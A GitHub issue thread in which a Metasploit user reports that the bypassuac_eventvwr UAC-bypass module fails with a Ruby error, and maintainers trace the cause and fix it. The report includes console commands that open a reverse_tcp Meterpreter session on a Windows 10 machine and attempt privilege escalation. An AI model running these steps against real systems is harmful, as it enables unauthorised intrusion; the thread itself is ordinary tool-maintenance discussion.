### ISSUE TITLE
bypassuac_eventvwr Exploit failed: NoMethodError undefined method `first' for nil:NilClass

### ISSUE THREAD

**Issue by Ulloreel** [rapid7/metasploit-framework#7886]
## How'd you do it?

Using Kali rolling 2016.1
got metasploit from apt-get install metasploit-framework
got  meterpreter session with windows/meterpreter/reverse_tcp payload
tried to escalate privileges but failed

victim:
windows 10 pro 64bit

## Expected behavior

What should happen is, exploit/windows/local/bypassuac_eventvwr should create a new session where i could get admin pivs with getsystem

## Current behavior
```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 2233
LPORT => 2233
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.108:2233 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (957487 bytes) to 192.168.1.167
[*] Meterpreter session 1 opened (192.168.1.108:2233 -> 192.168.1.167:51560)
msf exploit(handler) > use exploit/windows/local/bypassuac_eventvwr 
msf exploit(bypassuac_eventvwr) > set session 1
session => 1
msf exploit(bypassuac_eventvwr) > exploit

[*] Started reverse TCP handler on 192.168.1.108:4444 
[-] Exploit failed: NoMethodError undefined method `first' for nil:NilClass
[*] Exploit completed, but no session was created.
msf exploit(bypassuac_eventvwr) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.108:4444 
[-] Exploit failed: NoMethodError undefined method `first' for nil:NilClass
msf exploit(bypassuac_eventvwr) > 
```

ALSO ERRORS FROM LOG: http://pastebin.com/AyYNDGm8

## System stuff
umm?

Well i have tested exploits on other systems too, some tell me NameError uninitialized constant Rex::Powershell::Templates and some the same error as described above

### Metasploit version
v4.13.17-dev

### I installed Metasploit with:
- [X] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?

Kali linux 2016.1

**Comment by lexlutorr** [comment]
this , having the same problem with the new version dont know why , just downgrade version and problem solved, problem may be with some ruby package because the code of the bypass_event.rb is exactly the same

**Comment by Ulloreel** [comment]
What was the latest version you got it to work with?
I also tried it with 4.11.7 (Which i dont understand why is it not named 4.11.28 dev) from here:
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version
still got an error, should i try even older?

**Comment by lexlutorr** [comment]
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

navigate to that link and donwload version metasploit 4.12.0 second in the list

should work perfectly

**Comment by Ulloreel** [comment]
Works very well now. Thank you!

PS!. If any metasploit dev is looking at this, please consider fixing it :)
And.. add support to different scripts in new version releases, i cant even use vnc.

**Comment by OJ** [comment]
@Ulloreel scripts are deprecated. And yes, MSF devs are constantly paying attention, it's what we do.

So you're saying that the exploit in latest version is working, or not?

**Comment by Ulloreel** [comment]
Yeah it didnt work for me with 4.13.
4.12 should be fine.

**Comment by OJ** [comment]
Thanks, confirmed broken. Working on a solution.

**Comment by OJ** [comment]
It seems to be related to @dmaloney-r7's work adding auto targets to exploits, see here: https://github.com/rapid7/metasploit-framework/commits/master/lib/msf/core/exploit.rb

Hey @dmaloney-r7 there are a bunch of exploits, this one included, that break as a result of adding this automatic target. Do we now need to go through each exploit and make sure it handles this new case correctly?

**Comment by OJ** [comment]
@Ulloreel The short term work around for this is to manually set the `TARGET` for your exploit. `set TARGET 1` for x86, and `set TARGET 2` for x64 (and make sure your chosen payload architecture matches.

**Comment by busterb** [comment]
I'll grab this for an intermediate-term fix. Going to chat with @dmaloney-r7 tomorrow to see if there is an even better way to do this.

**Comment by OJ** [comment]
Fixed via #7889.
